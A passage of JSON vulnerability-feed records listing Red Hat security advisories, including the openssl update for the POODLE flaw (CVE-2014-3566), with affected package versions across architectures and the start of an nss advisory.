"openssl-debuginfo-0.9.8e-31.el5_11.x86_64.rpm", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i686", "packageFilename": "openssl-0.9.8e-31.el5_11.i686.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageFilename": "openssl-0.9.8e-31.el5_11.i386.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageFilename": "openssl-perl-0.9.8e-31.el5_11.i386.rpm", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "x86_64", "packageFilename": "openssl-0.9.8e-31.el5_11.x86_64.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "x86_64", "packageFilename": "openssl-perl-0.9.8e-31.el5_11.x86_64.rpm", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "ppc", "packageFilename": "openssl-debuginfo-0.9.8e-31.el5_11.ppc.rpm", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "ppc64", "packageFilename": "openssl-debuginfo-0.9.8e-31.el5_11.ppc64.rpm", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "s390", "packageFilename": "openssl-debuginfo-0.9.8e-31.el5_11.s390.rpm", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "s390x", "packageFilename": "openssl-debuginfo-0.9.8e-31.el5_11.s390x.rpm", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "ppc", "packageFilename": "openssl-perl-0.9.8e-31.el5_11.ppc.rpm", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "ppc", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.ppc.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "ppc64", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.ppc64.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "ppc", "packageFilename": "openssl-0.9.8e-31.el5_11.ppc.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "ppc64", "packageFilename": "openssl-0.9.8e-31.el5_11.ppc64.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "s390x", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.s390x.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "s390", "packageFilename": "openssl-0.9.8e-31.el5_11.s390.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "s390x", "packageFilename": "openssl-perl-0.9.8e-31.el5_11.s390x.rpm", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "s390x", "packageFilename": "openssl-0.9.8e-31.el5_11.s390x.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "s390", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.s390.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "ia64", "packageFilename": "openssl-debuginfo-0.9.8e-31.el5_11.ia64.rpm", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.i386.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "x86_64", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.x86_64.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "ia64", "packageFilename": "openssl-0.9.8e-31.el5_11.ia64.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "ia64", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.ia64.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "ia64", "packageFilename": "openssl-perl-0.9.8e-31.el5_11.ia64.rpm", "packageName": "openssl-perl", "operator": "lt"}], "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode.\nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate; it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication.\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to mitigate the CVE-2014-3566 issue. For the\nupdate to take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\n", "reporter": "RedHat", "published": "2014-10-16T04:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "redhat", "title": "(RHSA-2014:1653) Moderate: openssl security update", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:13:46", "id": "RHSA-2014:1653", "href": "https://access.redhat.com/errata/RHSA-2014:1653", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-06-12T21:09:44", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "x86_64", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-1.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "src", "packageName": "nss", "packageFilename": "nss-3.16.2.3-1.el5_11.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss", "packageFilename": "nss-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "x86_64", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-1.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "x86_64", "packageName": "nss", "packageFilename": "nss-3.16.2.3-1.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "ppc64", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-1.el5_11.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "ppc", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-1.el5_11.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "s390x", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-1.el5_11.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "s390", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-1.el5_11.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "ppc64", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-1.el5_11.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "ppc", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-1.el5_11.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "ppc64", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-1.el5_11.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "ppc64", "packageName": "nss", "packageFilename": "nss-3.16.2.3-1.el5_11.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "ppc", "packageName": "nss", "packageFilename": "nss-3.16.2.3-1.el5_11.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "ppc", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-1.el5_11.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "ppc", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-1.el5_11.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "s390x", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-1.el5_11.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "s390x", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-1.el5_11.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "s390", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-1.el5_11.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "s390", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-1.el5_11.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "s390x", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-1.el5_11.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "s390", "packageName": "nss", "packageFilename": "nss-3.16.2.3-1.el5_11.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "s390x", "packageName": "nss", "packageFilename": "nss-3.16.2.3-1.el5_11.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "ia64", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-1.el5_11.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "x86_64", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-1.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "x86_64", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-1.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "ia64", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-1.el5_11.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "ia64", "packageName": "nss", "packageFilename": "nss-3.16.2.3-1.el5_11.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "ia64", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-1.el5_11.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "ia64", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-1.el5_11.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "i686", "packageName": "nss-util-debuginfo", "packageFilename": "nss-util-debuginfo-3.16.2.3-2.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "src", "packageName": "nss", "packageFilename": "nss-3.16.2.3-3.el6_6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "src", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-2.el6_6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "x86_64", "packageName": "nss-util-debuginfo", "packageFilename": "nss-util-debuginfo-3.16.2.3-2.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "x86_64", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-3.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "i686", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-2.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "x86_64", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-2.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "x86_64", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-3.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "x86_64", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-3.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss", "packageFilename": "nss-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "i686", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-2.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss-sysinit", "packageFilename": "nss-sysinit-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "x86_64", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-2.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "x86_64", "packageName": "nss", "packageFilename": "nss-3.16.2.3-3.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "x86_64", "packageName": "nss-sysinit", "packageFilename": "nss-sysinit-3.16.2.3-3.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "x86_64", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-3.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "ppc64", "packageName": "nss-util-debuginfo", "packageFilename": "nss-util-debuginfo-3.16.2.3-2.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "ppc64", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-3.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "ppc", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-3.el6_6.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "ppc", "packageName": "nss-util-debuginfo", "packageFilename": "nss-util-debuginfo-3.16.2.3-2.el6_6.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "ppc64", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-3.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "ppc", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-3.el6_6.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "ppc64", "packageName": "nss-sysinit", "packageFilename": "nss-sysinit-3.16.2.3-3.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "ppc", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-2.el6_6.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "ppc64", "packageName": "nss", "packageFilename": "nss-3.16.2.3-3.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "ppc64", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-2.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "ppc", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-2.el6_6.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "ppc64", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-3.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "ppc64", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-3.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "ppc", "packageName": "nss", "packageFilename": "nss-3.16.2.3-3.el6_6.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "ppc64", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-2.el6_6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "ppc", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-3.el6_6.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "s390", "packageName": "nss-util-debuginfo", "packageFilename": "nss-util-debuginfo-3.16.2.3-2.el6_6.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "s390x", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-3.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "s390", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-3.el6_6.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "s390x", "packageName": "nss-util-debuginfo", "packageFilename": "nss-util-debuginfo-3.16.2.3-2.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "s390x", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-2.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "s390", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-2.el6_6.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "s390", "packageName": "nss", "packageFilename": "nss-3.16.2.3-3.el6_6.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "s390x", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-3.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "s390x", "packageName": "nss-sysinit", "packageFilename": "nss-sysinit-3.16.2.3-3.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "s390x", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-2.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "s390", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-2.el6_6.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "s390x", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-3.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "s390x", "packageName": "nss", "packageFilename": "nss-3.16.2.3-3.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "s390", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-3.el6_6.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "s390x", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-3.el6_6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "s390", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-3.el6_6.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-softokn-debuginfo", "packageFilename": "nss-softokn-debuginfo-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-softokn-debuginfo", "packageFilename": "nss-softokn-debuginfo-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-util-debuginfo", "packageFilename": "nss-util-debuginfo-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "x86_64", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-2.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-util-debuginfo", "packageFilename": "nss-util-debuginfo-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "i686", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-2.el7_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "src", "packageName": "nss", "packageFilename": "nss-3.16.2.3-2.el7_0.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "src", "packageName": "nss-softokn", "packageFilename": "nss-softokn-3.16.2.3-1.el7_0.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "src", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-1.el7_0.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "i686", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-2.el7_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "x86_64", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-2.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "i686", "packageName": "nss-devel", "packageFilename": 